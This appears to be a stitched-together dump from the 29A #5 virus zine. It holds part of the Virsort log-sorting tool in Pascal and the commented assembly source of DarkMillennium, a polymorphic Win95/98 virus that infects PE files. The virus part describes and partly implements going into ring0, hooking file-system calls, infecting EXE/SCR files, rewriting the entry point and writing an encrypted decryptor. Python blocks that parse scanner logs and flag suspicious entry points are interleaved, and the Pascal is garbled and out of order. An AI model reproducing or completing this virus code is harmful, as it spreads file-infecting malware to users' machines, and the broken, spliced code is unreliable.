writeln('Can not find FPROT.DAT in current directory!');
end;
procedure no_dat;
begin
writeln('No DAT files found!');
end;
{ The procedure header is missing from the source; the name is assumed.
  FileSize is not allowed on a text file, so an untyped file is used to
  get the size of the log. }
procedure erase_if_empty;
var
  fb   : file;
  size : longint;
begin
  assign(fb,log_file);
  reset(fb,1);
  size := filesize(fb);
  close(fb);
  if size = 0 then erase(fb);
end;
procedure DetectLog;
begin
flag1:=false;
tipo:='';
while flag1=false do
begin
readln(log,instring);
if (pos('infected:',instring) > 0) or (pos('warning:',instring) > 0) then
begin
tipo:='AVP';
flag1:=true;
end
else if pos(' Infection: ',instring) > 0 then
begin
tipo:='F-PROT';
flag1:=true;
end;
if eof(log) then flag1:=true;
end;
end;
procedure BuildNewDat_A(logname:string);
begin
writeln('Detected AVP log file');
writeln('Building AVP.DAT from ',logname);
reset(log);
assign(f,'AVP.DAT');
call_buffer;
settextbuf(f,tbuff^,tbuffsize);
rewrite(f);
inicializa_diccionarios;
count := 0;
repeat
readln(log,instring);
flag1 := false;
filename := instring;
virusname := instring;
if pos('infected:',filename) > 0 then
begin
for last_bar:=length(filename) downto 0 do if filename[last_bar]=':'
then break;
delete(filename,last_bar-9,length(filename));
delete(virusname,1,last_bar+1);
flag1 := true;
end
else if pos('warning:',filename) > 0 then
begin
for last_bar:=length(filename) downto 0 do if filename[last_bar]=':'
then break;
delete(filename,last_bar-8,length(filename));
delete(virusname,1,last_bar+1);
virusname := virusname+'.warning';
flag1 := true;
end;
if flag1 = true then
begin
if pos(' ',virusname) >0 then
begin
tmp_str:=copy(virusname,1,pos(' ',virusname
)-1);
delete(virusname,1,pos(' ',virusname));
virusname:=concat(tmp_str+'_'+virusname);
end;
escribe_diccionario;
if test < 0 then
begin
inc(count);
writeln(f,filename,#1,virusname);
end;
end;
until eof(log);
writeln(count,' virii found for AVP...');
Cierra_diccionarios;
close(f);
close(log);
writeln;
end;
procedure BuildNewDAT_F(logname:string);
begin
writeln('Detected F-Prot log file');
writeln('Building FPROT.DAT from ',logname);
reset(log);
assign(f,'FPROT.DAT');
call_buffer;
settextbuf(f,tbuff^,tbuffsize);
rewrite(f);
inicializa_diccionarios;
count := 0;
repeat
readln(log,instring);
space_position:=pos('ection: ',instring);
if space_position > 0 then
begin
filename := instring;
virusname := instring;
delete(filename,space_position-5,length(filename));
delete(virusname,1,space_position+7);
if pos('New or',virusname) > 0 then
begin
delete(virusname,1,pos('of ',
virusname)+2);
virusname:=concat(virusname+
'.variant');
end;
if (parm1 = '-BS') then
else if pos(' ',virusname) > 0 then delete(virusname,pos(' ',virusname),
length(virusname));
escribe_diccionario;
if test < 0 then
begin
inc(count);
writeln(f,filename,#1,virusname);
end;
end;
until eof(log);
writeln(count,' virii found for F-Prot...');
Cierra_diccionarios;
close(f);
close(log);
writeln;
end;
procedure CompareDAT_A(logname:string);
begin
writeln('Comparing virii from ',logname);
writeln('Detected AVP log file');
reset(log);
inicializa_diccionarios;
assign(f,'avp.dat');
call_buffer;
settextbuf(f,tbuff^,tbuffsize);
{$I-}
reset(f);
{$I+}
if IOResult <> 0 then not_find_avp
else
begin
repeat
readln(f,virusname);
delete(virusname,1,pos(#1,virusname));
escribe_diccionario;
until eof(f);
close(f);
tmp_str:=('NEWAVP.LOG');
assign(newfile,'NEWAVP.LOG');
call_buffer;
settextbuf(newfile,tbuff^,tbuffsize);
{$I-}
reset(newfile);
{$I+}
count:=1;
while IOResult = 0 do
begin
close(newfile);
str(count,tmp_str);
for i:=1 to 1-length(tmp_str) do tmp_str:=tmp_str;
tmp_str:=concat('NEWAVP.LO'+tmp_str);
inc(count);
assign(newfile,tmp_str);
call_buffer;
settextbuf(newfile,tbuff^,tbuffsize);
{$I-}
reset(newfile);
{$I+}
end;
rewrite(newfile);
count := 0;
log_file:=tmp_str;
repeat
readln(log,instring);
flag1 := false;
virusname := instring;
if pos('infected:',virusname) >0 then
begin
for last_bar:=length(virusname) downto 0 do if virusname[last_bar]=':'
then break;
delete(virusname,1,last_bar+1);
flag1 := true;
end
else
begin
if pos('warning:',virusname) >0 then
begin
for last_bar:=length(virusname) downto 0 do if virusname[last_bar]=
':' then break;
delete(virusname,1,last_bar+1);
virusname := virusname+'.warning';
flag1 := true;
end;
end;
if flag1 = true then
begin
if pos(' ',virusname) >0 then
begin
tmp_str:=copy(virusname,1,pos(' ',virusname
)-1);
delete(virusname,1,pos(' ',virusname));
virusname:=concat(tmp_str+'_'+virusname);
end;
escribe_diccionario;
if test < 0 then
begin
inc(count);
writeln(newfile,instring);
end;
end;
until eof(log);
if count=0 then no_new_virii_found
else
begin
writeln(count,' new AVP virii found...');
writeln;
end;
Cierra_diccionarios;
close(newfile);
close(log);
longitud(log_file);
end;
end;
procedure CompareDAT_F(logname:string);
begin
writeln('Comparing virii from ',logname);
writeln('Detected F-Prot log file');
reset(log);
inicializa_diccionarios;
assign(f,'fprot.dat');
call_buffer;
settextbuf(f,tbuff^,tbuffsize);
{$I-}
reset(f);
{$I+}
if IOResult <> 0 then not_find_fprot
else
begin
repeat
readln(f,virusname);
delete(virusname,1,pos(#1,virusname));
escribe_diccionario;
until eof(f);
close(f);
tmp_str:=('NEWFPROT.LOG');
assign(newfile,'NEWFPROT.LOG');
call_buffer;
settextbuf(newfile,tbuff^,tbuffsize);
{$I-}
reset(newfile);
{$I+}
count:=1;
while IOResult = 0 do
begin
close(newfile);
str(count,tmp_str);
for i:=1 to 1-length(tmp_str) do tmp_str:=tmp_str;
tmp_str:=concat('NEWFPROT.LO'+tmp_str);
inc(count);
assign(newfile,tmp_str);
call_buffer;
settextbuf(newfile,tbuff^,tbuffsize);
{$I-}
reset(newfile);
{$I+}
end;
rewrite(newfile);
count := 0;
log_file:=tmp_str;
repeat
readln(log,instring);
space_position:=pos('ection: ',instring);
if space_position > 0 then
begin
virusname := instring;
delete(virusname,1,space_position+7);
if pos('New or',virusname) > 0 then
begin
delete(virusname,1,pos('of ',
virusname)+2);
virusname:=concat(virusname+
'.variant');
end;
if (parm1 = '-CS') or (parm1 = '-CSW') then
else if pos(' ',virusname) > 0 then delete(virusname,pos(' ',virusname),
length(virusname));
escribe_diccionario;
if test < 0 then
begin
inc(count);
writeln(newfile,instring);
end;
end;
until eof(log);
if count=0 then no_new_virii_found
else
begin
writeln(count,' new F-Prot virii found...');
writeln;
end;
Cierra_diccionarios;
close(newfile);
close(log);
longitud(log_file);
end;
end;
procedure AddNewDAT_A(logname:string);
begin
writeln('Adding virii from ',logname);
writeln('Detected AVP log file');
reset(log);
inicializa_diccionarios;
assign(f,'avp.dat');
call_buffer;
settextbuf(f,tbuff^,tbuffsize);
{$I-}
reset(f);
{$I+}
if IOResult <> 0 then not_find_avp
else
begin
repeat
readln(f,virusname);
delete(virusname,1,pos(#1,virusname));
escribe_diccionario;
until eof(f);
close(f);
count := 0;
append(f);
repeat
readln(log,instring);
flag1 := false;
filename := instring;
virusname := instring;
if pos('infected:',filename) > 0 then
begin
for last_bar:=length(filename) downto 0 do if filename[last_bar]=':'
then break;
delete(filename,last_bar-9,length(filename));
delete(virusname,1,last_bar+1);
flag1 := true;
end
else if pos('warning:',filename) > 0 then
begin
for last_bar:=length(filename) downto 0 do if filename[last_bar]=':'
then break;
delete(filename,last_bar-8,length(filename));
delete(virusname,1,last_bar+1);
virusname := virusname+'.warning';
flag1 := true;
end;
if flag1 = true then
begin
if pos(' ',virusname) >0 then
begin
tmp_str:=copy(virusname,1,pos(' ',virusname
)-1);
delete(virusname,1,pos(' ',virusname));
virusname:=concat(tmp_str+'_'+virusname);
end;
escribe_diccionario;
if test < 0 then
begin
inc(count);
writeln(f,filename,#1,virusname);
if (parm1 = '-AL') or (parm1 = '-ALS') then writeln(newfile,
instring);
end;
end;
until eof(log);
if count=0 then no_new_virii_added
else
begin
writeln('Added ',count,' new virii for AVP...');
writeln;
end;
Cierra_diccionarios;
close(f);
close(log);
if (parm1 = '-AL') or (parm1 = '-ALS') then
begin
close(newfile);
longitud(log_file);
end;
end;
end;
procedure AddNewDAT_F(logname:string);
begin
writeln('Adding virii from ',logname);
writeln('Detected F-Prot log file');
reset(log);
inicializa_diccionarios;
assign(f,'fprot.dat');
call_buffer;
settextbuf(f,tbuff^,tbuffsize);
{$I-}
reset(f);
{$I+}
if IOResult <> 0 then not_find_fprot
else
begin
repeat
readln(f,virusname);
delete(virusname,1,pos(#1,virusname));
escribe_diccionario;
until eof(f);
close(f);
count := 0;
append(f);
repeat
readln(log,instring);
space_position:=pos('ection: ',instring);
if space_position > 0 then
begin
filename := instring;
virusname := instring;
delete(filename,space_position-5,length(filename));
delete(virusname,1,space_position+7);
if pos('New or',virusname) > 0 then
begin
delete(virusname,1,pos('of ',
virusname)+2);
virusname:=concat(virusname+
'.variant');
end;
if (parm1 = '-AS') or (parm1 = '-ALS') then
else if pos(' ',virusname) > 0 then delete(virusname,pos(' ',virusname),
length(virusname));
escribe_diccionario;
if test < 0 then
begin
inc(count);
writeln(f,filename,#1,virusname);
if (parm1 = '-AL') or (parm1 = '-ALS') then writeln(newfile,instring);
end;
end;
until eof(log);
if count=0 then no_new_virii_added
else
begin
writeln('Added ',count,' new virii for F-Prot...');
writeln;
end;
Cierra_diccionarios;
close(f);
close(log);
if (parm1 = '-AL') or (parm1 = '-ALS') then
begin
close(newfile);
longitud(log_file);
end;
end;
end;
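The three Virsort operations above (BuildNewDat, CompareDat, AddNewDat) all reduce to the same steps: detect which scanner wrote the log, cut each detection line into a file name and a normalized virus name, and de-duplicate on the name. The Python below is an added example that reproduces that logic, not Virsort's own code; the log lines and virus names are constructed placeholders, and the `keep_spaces` flag stands in for the `-BS`/`-CS`/`-AS` switches that keep the full F-Prot text after the name.

```python
"""Parse AVP and F-Prot scanner logs into (filename, virus name) pairs and
de-duplicate them the way Virsort's BuildNewDat / CompareDat / AddNewDat do.
Added example; the log lines below are constructed, not real scanner output."""

# Constructed sample logs.  Virus names are placeholders.
AVP_LOG = [
    "C:\\SAMPLES\\ONE.EXE infected: Sample.Alpha",
    "C:\\SAMPLES\\TWO.COM infected: Sample.Alpha",            # same name again
    "C:\\SAMPLES\\THREE.EXE infected: Sample.Beta variant",    # name with a space
    "C:\\SAMPLES\\FOUR.SCR warning: Type_Sample",              # heuristic hit
    "Scan process completed.",                                 # no detection
]
FPROT_LOG = [
    "C:\\SAMPLES\\ONE.EXE  Infection: Sample.Alpha",
    "C:\\SAMPLES\\FIVE.EXE  Infection: New or modified variant of Sample.Gamma",
    "C:\\SAMPLES\\SIX.EXE  Infection: Sample.Delta (exact)",
    "Results of virus scanning:",
]

DAT_SEPARATOR = "\x01"   # Virsort writes filename, #1, name on each DAT line


def detect_log_type(lines):
    """DetectLog: the first marker seen decides which parser to use."""
    for line in lines:
        if "infected:" in line or "warning:" in line:
            return "AVP"
        if " Infection: " in line:
            return "F-PROT"
    return None


def parse_avp_line(line):
    """AVP format: '<path> infected: <name>' or '<path> warning: <name>'.
    Returns (filename, normalized name) or None."""
    for marker, suffix in ((" infected: ", ""), (" warning: ", ".warning")):
        pos = line.rfind(marker)          # last ':' wins, as in Virsort
        if pos >= 0:
            name = line[pos + len(marker):].strip() + suffix
            return line[:pos], name.replace(" ", "_", 1)   # first space -> '_'
    return None


def parse_fprot_line(line, keep_spaces=False):
    """F-Prot format: '<path>  Infection: <name>'.  keep_spaces mirrors the
    -BS/-CS/-AS switches, which keep the whole text after the name."""
    marker = "  Infection: "
    pos = line.find(marker)
    if pos < 0:
        return None
    name = line[pos + len(marker):].strip()
    prefix = "New or modified variant of "
    if name.startswith(prefix):
        name = name[len(prefix):] + ".variant"
    if not keep_spaces:
        name = name.split(" ", 1)[0]      # cut at the first space
    return line[:pos], name


def parse_log(lines, keep_spaces=False):
    """Yield (filename, name) for every detection line, format auto-detected."""
    kind = detect_log_type(lines)
    for line in lines:
        if kind == "AVP":
            hit = parse_avp_line(line)
        elif kind == "F-PROT":
            hit = parse_fprot_line(line, keep_spaces)
        else:
            hit = None
        if hit:
            yield hit


def build_dat(lines):
    """BuildNewDat: one entry per distinct name, first file seen wins."""
    dat = {}
    for filename, name in parse_log(lines):
        dat.setdefault(name, filename)
    return dat


def find_new(dat, lines):
    """CompareDat: detections whose name is not yet in the DAT (each once)."""
    seen = set(dat)
    new = []
    for filename, name in parse_log(lines):
        if name not in seen:
            seen.add(name)
            new.append((filename, name))
    return new


def add_new(dat, lines):
    """AddNewDat: merge the new detections into the DAT, return how many."""
    new = find_new(dat, lines)
    dat.update({name: filename for filename, name in new})
    return len(new)


def dat_to_text(dat):
    """Serialize in Virsort's DAT layout: filename, #1, name per line."""
    return "\n".join(f"{filename}{DAT_SEPARATOR}{name}" for name, filename in dat.items())


def dat_from_text(text):
    """Read a DAT back; the name after the #1 separator is the dictionary key."""
    dat = {}
    for line in text.splitlines():
        filename, _, name = line.partition(DAT_SEPARATOR)
        dat.setdefault(name, filename)
    return dat
```

A single dictionary keyed on the full name replaces Virsort's thirteen first-letter dictionaries; the split only mattered for the memory limits of the DOS build. Note that both parsers trust the scanner's output format, so a file name that itself contains the marker text will be cut in the wrong place, which is why the AVP parser searches from the right as the original does.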
procedure CountViruses;
begin
flag1 := false;
assign(f,'avp.dat');
{$I-}
reset(f);
{$I+}
if IOResult = 0 then
begin
flag1 := true;
count:= 0;
if parm1 = '-H' then
begin
repeat
readln(f,temp_string);
count := count + 1;
until eof(f);
writeln(count,' virii for AVP');
end
else
begin
repeat
readln(f,temp_string);
if pos('warning',temp_string) > 0 then
else count := count + 1;
until eof(f);
writeln(count,' unique virii for AVP');
end;
close(f);
end;
assign(f,'fprot.dat');
{$I-}
reset(f);
{$I+}
if IOResult = 0 then
begin
flag1 := true;
count := 0;
if parm1 = '-H' then
begin
repeat
readln(f,temp_string);
count := count + 1;
until eof(f);
writeln(count,' virii for F-Prot');
end
else
begin
repeat
readln(f,temp_string);
if (pos('unknown?',temp_string) > 0) or
(pos('damaged?',temp_string) > 0) then
else count := count + 1;
until eof(f);
writeln(count,' unique virii for F-Prot');
end;
close(f);
end;
if not flag1 then no_dat; { closing lines restored: no_dat reports that neither DAT file could be opened }
end;
procedure BuildNew;
begin
DetectLog;
if tipo = 'AVP' then BuildNewDat_A(parm2)
else if tipo = 'F-PROT' then BuildNewDat_F(parm2)
else no_virii;
end;
procedure CompareDat;
begin
DetectLog;
if tipo = 'AVP' then CompareDat_A(parm2)
else if tipo = 'F-PROT' then CompareDat_F(parm2)
else no_virii;
end;
procedure AddNewDat;
begin
DetectLog;
if tipo = 'AVP' then AddNewDat_A(parm2)
else if tipo = 'F-PROT' then AddNewDat_F(parm2) { log name is the second parameter, as for AVP }
else no_virii;
end;
begin
writeln;
writeln(' Virsort 2000 Special Edition for 29A #5 by VirusBuster/29A');
writeln(
'-=----------------------------------------------------------------------------=-');
parm1 := paramstr(1);
parm2 := paramstr(2);
parm3 := paramstr(3);
longintPtr=^longint;
dictionary=record name: string[40];
index,corpus: longArray;
frequency: longint;
fqPtr: longintPtr;
end;
const expectedWordLength=10;
type aRowPtr=^aRow;
aDictionaryPtr=^dictionary;
anIndex=array[0..0] of aRowPtr;
anIndexPtr=^anIndex;
aRow= array[0..0] of byte;
memRec=object
name: string[40];
bytesPerRow,bytesInIndex,lastRow,recordsPerRow,
bytesPerRecord,shift,mask: word;
maxRecordsInArray,lastRecord,pos: longint;
insertMode: boolean;
rowPtrNo: anIndexPtr;
dicPtr: aDictionaryPtr;
end;
implementation
uses crt;
GetMem(newIndex_,bytesInNewIndex);
Move(rowPtrNo^,newIndex_^,bytesInIndex);
FreeMem(rowPtrNo,bytesInIndex);
rowPtrNo:=newIndex_;
for i:=lastRow+1 to newLastRow do
begin
GetMem(rowPtrNo^[i],bytesPerRow);
FillChar(rowPtrNo^[i]^,bytesPerRow,0);
end;
lastRow:=newLastRow;
bytesInIndex:=bytesInNewIndex;
maxRecordsInArray:=(lastRow+1)*recordsPerRow;
end
end;
procedure MemClose;
begin
end;
procedure dicClose;
begin
end;
You can compare the speed of VS2000 8.88, the last version of the official VS2000, with
this version, and you will notice it is the same. That means VS2000 has never
used any code from VSNG, as I have told many times already.
VirusBuster/29A
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ[COMMENT.TXT]ÄÄÄ
; DarkMillennium Project
; developed by Clau / Ultimate Chaos
;
; The Project is a Win95/98 compatible virus.
; Also this is my first virus that infects PE files.
;
; Greets goes to all Ultimate Chaos members and all people in VX scene.
; Respect to all of you.
;
;----------------
; DESCRIPTION |
;----------------
;
; on program load :
; - it processes a polymorphic decryptor
; - it is made in 2 parts
; - 1. Finding the key that the encryption was made with (between 0 ... 65535)
; - 2. Decrypt the code with that key
; - check if it is already resident
; - if not, go into ring0
; - get memory with GetHeap
; - copy itself into allocated memory
; - hook the API (InstallFileSystemAPIhook)
; - return to host program
; on FS calls, if IFSFN_OPEN/IFSFN_RENAME/IFSFN_FILEATRIB
; - check if extension is EXE/SCR
; - check if the file format is PE
; - if so, infect the file
; - Generate random polymorphic decryptor, and write it to file
; - Encrypt the code with a simple XOR method using a random key which is
;   never saved
;   It uses only a 2 byte buffer for encryption: it encrypts 2 bytes at a time and
;   writes them into the file, until all the code is encrypted and written. This
;   method is slower, but less memory is used.
; - check for a condition and if it is true then display a message box through a VxD call
; payloads, the condition is that the number of infected files equals
;   infected_nr_trigger
; - thanks go to Midnyte (member of Ultimate Chaos, coder, GFXer) for helping me
;   with this nice payload
; - on BMP and GIF open they will go darker and darker on every open
; - on some BMPs and GIFs the effect is cooler, I can say strange
;
;----------------------------------------
; Polymorphic engine description |
;----------------------------------------
;
; This is my first poly engine.
; - random junk code
; - do nothing instructions (instructions that do not interfere with the decryptor)
; - they are 1, 2 or more byte instructions, and more instructions combined
; - 1 byte - cmc, clc, stc, nop
; - 2 bytes - a range of INTs
; - > 2 bytes - it can generate random MOV, PUSH, POP ... in fact all instructions
; that are used in the decryptor, without interfering with the decryptor (it uses regs
; that are not used in the decrypt process)
; - more ways to do the same thing instructions
; example : MOV EAX, 12345678h <=> PUSH 12345678h
; POP EAX
; - the decryptor size can be ~ 3 times bigger than the original decryptor
; - if the decryptor is smaller than the decryptor before, the space between it and the
;   encrypted code will be filled with junk.
;
;
; Compile with:
; tasm32 /m3 /ml darkmillennium.asm
; tlink32 /Tpe /aa /x darkmillennium.obj, darkmillennium.exe, , import32.lib
;
; report any bugs to clau@ultimatechaos.org
;
.386p
.model flat
extrn ExitProcess:proc
extrn MessageBoxA:proc
.code
Begin:
push 64
push offset w_title
push offset copyright
push 0
call MessageBoxA
jmp Start
.data
popad
; "allocate" space equal to current decryptor size, in case that the next generated
; decryptors will be bigger, and it will be bigger than this one
; this space will be filled with random junk instructions
db ($ - offset Start) * 2 dup (90h) ; for big decryptors not overwrite Data Zone
Encr_Code:
key dw 9090h
jmp virus_code
IDT_Address dq 0
flag db 0
newaddress dd 0
exception dd 0
old_offset dd 0
filename db 260 dup (0)
handle dd 0
crt_move dd 0
peheader dd 0
S_Align dd 0
F_Align dd 0
sec_ptr dd 0
Old_EIP dd 0
SOI dd 0
virusplace dd 0
imagebase dd 0
infected_files dw 0
SEH_nextpointer dd ?
SEH_oldpointer dd ?
SEH_errorhandler dd ?
IMAGE_DOS_HEADER struc
MZ_magic dw ?
MZ_cblp dw ?
MZ_cp dw ?
MZ_crlc dw ?
MZ_cparhdr dw ?
MZ_minalloc dw ?
MZ_maxalloc dw ?
MZ_ss dw ?
MZ_sp dw ?
MZ_csum dw ?
MZ_ip dw ?
MZ_cs dw ?
MZ_lfarlc dw ?
MZ_ovno dw ?
MZ_res dw 4 dup (?)
MZ_oemid dw ?
MZ_oeminfo dw ?
MZ_res2 dw 10 dup (?)
MZ_lfanew dd ?
IMAGE_DOS_HEADER ends
IMAGE_DOS_HEADER_SIZE = SIZE IMAGE_DOS_HEADER
IMAGE_FILE_HEADER struc
PE_Magic dd ?
Machine dw ?
NumberOfSections dw ?
TimeDateStamp dd ?
PointerToSymbolTable dd ?
NumberOfSymbols dd ?
SizeOfOptionalHeader dw ?
Characteristics dw ?
IMAGE_FILE_HEADER ends
IMAGE_FILE_HEADER_SIZE = SIZE IMAGE_FILE_HEADER
IMAGE_DATA_DIRECTORY struc
dd_VirtualAddress dd ?
dd_Size dd ?
IMAGE_DATA_DIRECTORY ends
IMAGE_DIRECTORY_ENTRIES struc
DE_Export IMAGE_DATA_DIRECTORY ?
DE_Import IMAGE_DATA_DIRECTORY ?
DE_Resource IMAGE_DATA_DIRECTORY ?
DE_Exception IMAGE_DATA_DIRECTORY ?
DE_Security IMAGE_DATA_DIRECTORY ?
DE_BaseReloc IMAGE_DATA_DIRECTORY ?
DE_Debug IMAGE_DATA_DIRECTORY ?
DE_Copyright IMAGE_DATA_DIRECTORY ?
DE_GlobalPtr IMAGE_DATA_DIRECTORY ?
DE_TLS IMAGE_DATA_DIRECTORY ?
DE_LoadConfig IMAGE_DATA_DIRECTORY ?
DE_BoundImport IMAGE_DATA_DIRECTORY ?
DE_IAT IMAGE_DATA_DIRECTORY ?
IMAGE_DIRECTORY_ENTRIES ends
IMAGE_NUMBEROF_DIRECTORY_ENTRIES = 16
IMAGE_OPTIONAL_HEADER struc
OH_Magic dw ?
OH_MajorLinkerVersion db ?
OH_MinorLinkerVersion db ?
OH_SizeOfCode dd ?
OH_SizeOfInitializedData dd ?
OH_SizeOfUninitializedData dd ? ; Uninitialized Data
OH_AddressOfEntryPoint dd byte ptr ? ; Initial EIP
OH_BaseOfCode dd byte ptr ? ; Code Virtual Address
OH_BaseOfData dd byte ptr ? ; Data Virtual Address
OH_ImageBase dd byte ptr ? ; Base of image
OH_SectionAlignment dd ? ; Section Alignment
OH_FileAlignment dd ? ; File Alignment
OH_MajorOperatingSystemVersion dw ? ; Major OS
OH_MinorOperatingSystemVersion dw ? ; Minor OS
OH_MajorImageVersion dw ? ; Major Image version
OH_MinorImageVersion dw ? ; Minor Image version
OH_MajorSubsystemVersion dw ? ; Major Subsys version
OH_MinorSubsystemVersion dw ?
OH_Win32VersionValue dd ? ; win32 version
OH_SizeOfImage dd ? ; Size of image
OH_SizeOfHeaders dd ? ; Size of Header
OH_CheckSum dd ? ; unused
OH_Subsystem dw ? ; Subsystem
OH_DllCharacteristics dw ? ; DLL characteristic
OH_SizeOfStackReserve dd ? ; Stack reserve
OH_SizeOfStackCommit dd ? ; Stack commit
OH_SizeOfHeapReserve dd ? ; Heap reserve
OH_SizeOfHeapCommit dd ? ; Heap commit
OH_LoaderFlags dd ? ; Loader flags
OH_NumberOfRvaAndSizes dd ? ; Number of directories
UNION ; directory entries
OH_DataDirectory IMAGE_DATA_DIRECTORY\
IMAGE_NUMBEROF_DIRECTORY_ENTRIES DUP (?)
OH_DirectoryEntries IMAGE_DIRECTORY_ENTRIES ?
ends
ends
IMAGE_OPTIONAL_HEADER_SIZE = SIZE IMAGE_OPTIONAL_HEADER
IMAGE_SECTION_HEADER struc
SH_Name db 8 dup (?)
UNION
SH_PhusicalAddress dd byte ptr ?
SH_VirtualSize dd ?
ends
SH_VirtualAddress dd byte ptr ?
SH_SizeOfRawData dd ?
SH_PointerToRawData dd byte ptr ?
SH_PointerToRelocations dd byte ptr ?
SH_PointerToLinenumbers dd byte ptr ?
SH_NumberOfRelocations dw ?
SH_NumberOfLinenumbers dw ?
SH_Characteristics dd ?
IMAGE_SECTION_HEADER ends
IMAGE_SECTION_HEADER_SIZE = SIZE IMAGE_SECTION_HEADER
mz_header IMAGE_DOS_HEADER ?
pe_header IMAGE_FILE_HEADER ?
oh_header IMAGE_OPTIONAL_HEADER ?
section IMAGE_SECTION_HEADER ?
go_into_ring0: int exception_int ; This will jump us to Ring0 proc in ring0 mode
generation_1: push 0
call ExitProcess
Ring0 proc
pusha
; hook API
lea eax, [edi + API_hook - Start]
push eax
patch2_val equ InstallFileSystemAPIhook + 256 * 256 * IFSMgr
patch2 label far
VxDCall IFSMgr, InstallFileSystemAPIhook
pop ebx
mov [edi + nexthook - Start], eax
jmp success
back_to_ring3: popad
iretd
Ring0 endp
push ebx
push esi
push edi
db 0bfh
delta1 dd 0
; Unicode conversion
no_path: push 0 ; BCS/WANSI code
push 260 ; maximum filename
mov eax, [ebp + 28] ; get IOREQ
mov eax, [eax + 12]
add eax, 4
push eax ; push filename
push esi ; push destination
; Address of Entrypoint to our virus ( Old Virtual Address + New Virtual Size -
; Virus Size )
lea esi, [edi + section - Start]
mov eax, dword ptr [esi.SH_VirtualAddress]
add eax, dword ptr [esi.SH_VirtualSize]
sub eax, virussize
lea esi, [edi + oh_header - Start]
mov dword ptr [esi.OH_AddressOfEntryPoint], eax
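The entry-point rewrite just above (OH_AddressOfEntryPoint set to the last section's SH_VirtualAddress plus its enlarged SH_VirtualSize minus the virus size) is the header pattern a scanner or triage script looks for: an entry point that sits in the last section, close to its end, instead of in the code section a linker emits. The Python below is an added defensive example, not DarkMillennium's or the zine's code; it walks the structures declared above (IMAGE_DOS_HEADER, IMAGE_FILE_HEADER, IMAGE_OPTIONAL_HEADER, IMAGE_SECTION_HEADER) with `struct`, handles PE32 only, and builds its own minimal header images in memory rather than reading a real executable. The `tail_window` threshold is an assumption chosen for the example.

```python
"""Read PE32 headers and classify where OH_AddressOfEntryPoint lands.
Added example with constructed header images; no real file is touched."""
import struct

DOS_HEADER_SIZE = 64        # SIZE IMAGE_DOS_HEADER
FILE_HEADER_SIZE = 20       # IMAGE_FILE_HEADER without the 'PE\0\0' signature
OPTIONAL_HEADER_SIZE = 224  # PE32 optional header incl. 16 data directories
SECTION_HEADER_SIZE = 40    # SIZE IMAGE_SECTION_HEADER


def build_image(entry_point, sections):
    """Assemble a minimal PE32 header block (constructed test data, not a
    loadable program).  `sections` is a list of (name, va, vsize, raw_size)."""
    dos = bytearray(DOS_HEADER_SIZE)
    dos[0:2] = b"MZ"                                      # MZ_magic
    struct.pack_into("<I", dos, 0x3C, DOS_HEADER_SIZE)    # MZ_lfanew -> PE header
    file_hdr = b"PE\0\0" + struct.pack("<HHIIIHH", 0x14C, len(sections), 0, 0, 0,
                                        OPTIONAL_HEADER_SIZE, 0x010F)
    opt = bytearray(OPTIONAL_HEADER_SIZE)
    struct.pack_into("<H", opt, 0, 0x10B)                 # OH_Magic: PE32
    struct.pack_into("<I", opt, 16, entry_point)          # OH_AddressOfEntryPoint
    struct.pack_into("<I", opt, 28, 0x400000)             # OH_ImageBase
    struct.pack_into("<I", opt, 32, 0x1000)               # OH_SectionAlignment
    struct.pack_into("<I", opt, 36, 0x200)                # OH_FileAlignment
    struct.pack_into("<I", opt, 92, 16)                   # OH_NumberOfRvaAndSizes
    sec = b"".join(
        struct.pack("<8sIIIIIIHHI", name.ljust(8, b"\0"), vsize, va, raw,
                    0x400 + i * 0x200, 0, 0, 0, 0, 0x60000020)
        for i, (name, va, vsize, raw) in enumerate(sections))
    return bytes(dos) + file_hdr + bytes(opt) + sec


def is_pe(image):
    """MZ_magic present and MZ_lfanew points at a 'PE\0\0' signature."""
    if len(image) < DOS_HEADER_SIZE or image[:2] != b"MZ":
        return False
    lfanew = struct.unpack_from("<I", image, 0x3C)[0]
    return image[lfanew:lfanew + 4] == b"PE\0\0"


def parse_headers(image):
    """Return (entry_point_rva, [(name, va, vsize, raw_size), ...])."""
    if not is_pe(image):
        raise ValueError("not a PE image")
    lfanew = struct.unpack_from("<I", image, 0x3C)[0]
    nsec = struct.unpack_from("<H", image, lfanew + 6)[0]         # NumberOfSections
    opt_size = struct.unpack_from("<H", image, lfanew + 20)[0]    # SizeOfOptionalHeader
    opt = lfanew + 4 + FILE_HEADER_SIZE
    if struct.unpack_from("<H", image, opt)[0] != 0x10B:
        raise ValueError("only PE32 optional headers are handled here")
    entry = struct.unpack_from("<I", image, opt + 16)[0]          # OH_AddressOfEntryPoint
    sections, pos = [], opt + opt_size
    for _ in range(nsec):
        name, vsize, va, raw = struct.unpack_from("<8sIII", image, pos)
        sections.append((name.rstrip(b"\0").decode("ascii", "replace"), va, vsize, raw))
        pos += SECTION_HEADER_SIZE
    return entry, sections


def assess_entry_point(image, tail_window=0x1000):
    """Heuristic: ('ok', section), ('last-section-tail', section) when the entry
    point is within tail_window bytes of the end of the last section, or
    ('outside', None) when no section covers it.  tail_window is an assumption;
    single-section binaries will need a looser rule."""
    entry, sections = parse_headers(image)
    for idx, (name, va, vsize, raw) in enumerate(sections):
        if va <= entry < va + max(vsize, raw):
            if idx == len(sections) - 1 and va + vsize - entry <= tail_window:
                return "last-section-tail", name
            return "ok", name
    return "outside", None


# Constructed images: a clean layout, the appended-code layout, and a stray entry point.
SAMPLE_SECTIONS = [(b".text", 0x1000, 0x800, 0x800), (b".data", 0x2000, 0x3000, 0x3000)]
CLEAN_IMAGE = build_image(0x1200, SAMPLE_SECTIONS)
TAIL_IMAGE = build_image(0x2000 + 0x3000 - 0x600, SAMPLE_SECTIONS)   # VA + VirtualSize - size
STRAY_IMAGE = build_image(0x9000, SAMPLE_SECTIONS)
```

The check is deliberately a triage signal rather than a verdict: packers and some linkers also put the entry point in a late section, so a hit should be followed by looking at the bytes at the entry point and at whether the last section is both writable and executable (SH_Characteristics), which the constructed images above set uniformly and a real scan would compare.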
; Generate decryptor
pushad
mov ebp, edi
call GenDecryptor
popad
; Call Payload
call Payload
; Write decryptor
mov edx, edi
mov ecx, Encr_Code - Start
mov ebx, dword ptr [edi + handle - Start]
mov esi, dword ptr [edi + virusplace - Start]
xchg edx, esi
call file_write
not_exe: popa
db 0b8h
nexthook dd 0
call [eax]
add esp, 6 * 4
pop edi
